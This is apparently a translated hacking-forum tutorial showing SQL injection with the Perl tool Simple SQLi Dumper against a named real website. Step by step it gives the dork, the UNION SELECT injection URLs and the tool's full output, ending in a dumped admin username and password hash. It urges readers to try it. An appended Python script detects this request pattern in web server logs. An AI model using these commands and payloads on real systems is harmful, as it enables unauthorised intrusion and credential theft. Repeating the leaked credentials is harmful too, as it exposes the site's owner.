SQL injection tutorial with Simple SQLi Dumper v5.1
preparing the tools of war:
1. cigarettes
2. snacks
3. beer
4. a girl to boost your spirits while injecting :D
Steps that really must be followed carefully
1. perl: on Linux it is already there :D .. on Windows, download it here "http://www.perl.org/get.html"
2. sqli dumper v5.1 ... download it here "http://www.ziddu.com/download/10540105/ssdp51.tar.gz.html "
then extract it: on Windows extract it to drive C, on Linux put it in Linux's my documents folder .... Pfft
ok, all set? now let's start .......
target : http://www.beautycall.co.uk/gallery.php?id=1
dork :inurl:/gallery.php?id=
now open a terminal window on Linux .. or cmd on Windows
step 1: Find Magic Number / Null Column "-magic"
Command: perl ssdp.pl -u [URL] -magic
example: type this command
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic
and this is the result .....
--------------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:22:10 2010
Help Command: -h, -help, --help
[+] URL: http://www.beautycall.co.uk/gallery.php?id=1
[+] End Tag: --
Attempting to find the magic number...
[+] Testing: 1,2,3,
[+] Field Length : 3
[+] Magic Number : 2,3,
[+] URL Injection: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
Showing MySQL Information ...
[+] Database: beautycall_co_uk_web
[+] User: pmowat@localhost
[+] Version: 5.0.67
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": No
Done.
---------------------------------------------------------------------------------------
step 2
find the table
Concat Tables
Command: perl ssdp.pl -u [SQLi URL] -table
example: type this command:
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table
this is the result:
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:24:59 2010
Help Command: -h, -help, --help
[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 40
Showing tables ...
[1] CITY(6)
[2] COUNTRY(32)
[3] admin(1)
[4] aplicationform(31)
[5] appointment(898)
[6] appointment_event(8)
[7] artist(96)
[8] artist_text_image(1)
[9] city(6)
[10] contact(1)
[11] efranchisee(122)
[12] files(2)
[13] files2(33)
[14] files3(0)
[15] folders(2)
[16] form(158)
[17] franchise(9)
[18] franchiseefolders(8)
[19] galery(20)
[20] homepage(1)
[21] links(26)
[22] links_cat(12)
[23] log(0)
[24] midlands(10)
[25] north(6)
[26] package_image(1)
[27] packages(5)
[28] postcode(122)
[29] regions(8)
[30] register(4)
[31] services(6)
[32] shortform(36)
[33] southeast(14)
[34] southwest(6)
[35] states(11)
[36] subfolders(14)
[37] ukmap(125)
[38] ukpostcodes(104)
[39] vouchers(1)
[40] wales(2)
Done.
--------------------------------------------------------------------------------
now we have the tables :D
look at that admin table :D
now we want the columns of that admin table .......
step 3
find the admin columns
Concat Columns
Required Options: -u, -t
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
example: type this command
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column
the result looks like this
---------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:38:30 2010
Help Command: -h, -help, --help
[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Number of Columns: 4
Showing columns from table "admin" ...
[+] admin(1): id,username,password,email
Done.
------------------------------------------------------------------------------------
there are the admin columns: id, username, password and email .... wow, this tool is cool Pfft
now what's next ..
step end
dumping data
now we'll see the information inside those columns .. :)
command # perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump
example: type this command:
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump
the result
-------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:43:37 2010
Help Command: -h, -help, --help
[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Column Name: username,password
[+] Data Count: 1
Dumping Data ...
[1] beautycall2010 : d68553e40237bde1465a1da5b199c072
Done.
-----------------------------------------------------------------------------
finally we get the admin username and password ...
username : beautycall2010
pass: d68553e40237bde1465a1da5b199c072
see, it's simple .. and easy .... go ahead and try it ....
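Seen from the server side, every request in the steps above carries the same "AND 1=2 UNION ALL SELECT 1,c0li,3" string in the id parameter, so it stands out in the web server's access log. The script below is an added example, not part of the original post or of Simple SQLi Dumper: it scans log lines for that request shape. The log lines, client addresses, user agent and the /news.php path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (client IPs and user agent are placeholders).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jul/2010:14:22:09 +0000] "GET /gallery.php?id=1 HTTP/1.1" 200 5120 "-" "ExampleAgent/1.0"
203.0.113.7 - - [03/Jul/2010:14:22:10 +0000] "GET /gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3-- HTTP/1.1" 200 4980 "-" "ExampleAgent/1.0"
203.0.113.7 - - [03/Jul/2010:14:22:11 +0000] "GET /gallery.php?id=1%20and%201%3D2%20union/**/all%20select%201,2,3 HTTP/1.1" 200 4980 "-" "ExampleAgent/1.0"
198.51.100.4 - - [03/Jul/2010:14:23:00 +0000] "GET /news.php?title=student+union+select+committee HTTP/1.1" 200 900 "-" "ExampleAgent/1.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# UNION [ALL] SELECT followed by a comma-separated column list.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+([\w@.()']+(?:\s*,\s*[\w@.()']+)*)")
# "AND n=m": with n != m it is the always-false condition seen in the tool's URL.
COND_RE = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)")

def scan(log_text):
    """Return one finding per request whose query string carries a UNION SELECT list."""
    findings = []
    for line in log_text.splitlines():
        req = REQUEST_RE.search(line)
        if not req:
            continue
        parts = urlsplit(req.group(1))
        # Normalise: URL-decode, lowercase, drop inline /**/ comments, collapse spaces.
        query = unquote_plus(parts.query).lower()
        query = re.sub(r"/\*.*?\*/", " ", query)
        query = re.sub(r"\s+", " ", query)
        union = UNION_RE.search(query)
        if not union:
            continue
        cols = [c.strip() for c in union.group(1).split(",")]
        if len(cols) < 2 and not cols[0].isdigit():
            continue  # heuristic: a single bare word after "select" is ordinary text
        cond = COND_RE.search(query)
        findings.append({
            "client": line.split()[0],
            "path": parts.path,
            "columns": len(cols),          # matches the tool's "Field Length"
            "marker": "c0li" in cols,      # placeholder token shown in the post's URLs
            "false_condition": bool(cond and cond.group(1) != cond.group(2)),
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The single-word filter is a heuristic to keep ordinary text such as "student union select committee" from being flagged; it is not a substitute for parameterised queries in gallery.php.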